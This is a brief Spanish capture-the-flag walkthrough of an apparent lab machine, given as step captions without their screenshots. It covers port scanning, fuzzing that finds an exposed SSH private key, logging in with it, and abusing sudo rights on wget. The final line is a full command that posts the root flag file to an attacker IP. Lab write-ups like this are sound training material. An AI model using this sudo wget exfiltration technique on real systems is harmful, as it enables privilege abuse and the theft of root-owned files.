Hacemos el escaneo con nmap:
Y esto es lo que corre por el puerto 80:
Si hacemos fuzzing nos encontramos con el directorio sitemap:
Si volvemos a hacer fuzzing, nos encontramos con un .ssh, pero debemos usar el diccionario de common.txt:
Donde nos encontramos con un id_rsa:
Nos lo guardamos:
Damos permisos 600 a este id_rsa y entramos a la máquina víctima:
Una vez dentro, ejecutamos sudo -l y podemos ver que podemos ejecutar como root el comando wget:
Por tanto vamos a subir como sudo la flag de root a nuestra máquina atacante:
sudo /usr/bin/wget --post-file=/root/root_flag.txt 10.8.100.91